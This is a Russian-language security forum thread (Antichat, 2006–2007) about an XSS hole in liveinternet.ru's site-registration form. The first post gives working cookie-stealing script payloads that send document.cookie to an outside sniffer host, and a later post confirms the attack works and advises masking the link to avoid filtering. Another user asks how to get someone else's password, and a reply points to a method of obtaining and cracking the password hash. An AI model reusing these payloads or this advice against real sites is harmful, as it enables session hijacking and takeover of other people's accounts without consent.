ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
Перезагрузить страницу liveinternet
   
Закрытая тема
 
Опции темы Поиск в этой теме Опции просмотра

liveinternet
  #1  
Старый 11.11.2006, 18:34
Аватар для LeverOne
LeverOne
Познающий
Регистрация: 22.02.2006
Сообщений: 67
Провел на форуме:
4155100

Репутация: 2033
По умолчанию liveinternet
найдено D=P=CH= MOD=
http://www.liveinternet.ru/add

Вводим
"><script>alert("xss")</script>

алерт работает!
Но КУКИ не приходят!!!!
Хотя ввожу в поле "Ключевые слова" все верно:
"<img src="javascript:img = new Image(); img.src = 'http://antichat.ru/cgi-bin/s.jpg?'+document.cookie;">
либо
"<script>img = new Image(); img.src = "http://antichat.ru/cgi-bin/s.jpg?"+document.cookie;</script>
и даже этим способом:
"<srcipt src=http://мой_сайт.ru/js.js></script>

Пробую "регить сайт", заходя со своего акка.
Не приходят, мать их!!!

Не понимаю, в чем дело? Подскажите!
Последний раз редактировалось LeverOne; 11.11.2006 в 21:12..
 

  #2  
Старый 11.11.2006, 18:37
Аватар для Ksander
Ksander
Постоянный
Регистрация: 21.06.2006
Сообщений: 931
Провел на форуме:
4836047

Репутация: 930


По умолчанию
Может изза браузера.
 

  #3  
Старый 11.11.2006, 18:43
Аватар для Kalowrat
Kalowrat
Новичок
Регистрация: 03.11.2006
Сообщений: 12
Провел на форуме:
33973

Репутация: 0
По умолчанию
проверь хтмл код когда вставил снифер.. у меня document.cookie обрезал движок сайта...
если ничо не путаю.. давно это было
 

ОК
  #4  
Старый 12.11.2006, 23:07
Аватар для LeverOne
LeverOne
Познающий
Регистрация: 22.02.2006
Сообщений: 67
Провел на форуме:
4155100

Репутация: 2033
Talking ОК
Все работает.
Просто пытаются фильтровать "="
Ссылку советую маскировать во избежание доп. фильтрации в приватных сообщениях.
Вариант со скриптом на собственном хосте прекрасно прокатывает.
Тема исчерпана.
 

  #5  
Старый 26.02.2007, 00:35
Аватар для DeadFire
DeadFire
Новичок
Регистрация: 05.05.2006
Сообщений: 5
Провел на форуме:
30199

Репутация: 0
По умолчанию
А можно ли как-нибудь на liveintrnet добыть чужой пароль или хотябы читать "закрытые" сообщения (т.е. те которые только для друзей)??? Если да, то как.

Очень надо.

Заранее спасибо.
 

  #6  
Старый 26.02.2007, 10:55
Аватар для InferNo23
InferNo23
Участник форума
Регистрация: 05.09.2006
Сообщений: 187
Провел на форуме:
6860213

Репутация: 378
По умолчанию
http://forum.antichat.ru/thread29020.html
получишь хеш пароля в md5(вроде бы)
потом расшифруешь пароль и зайдешь...
 
Закрытая тема



« Предыдущая тема | Следующая тема »


Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ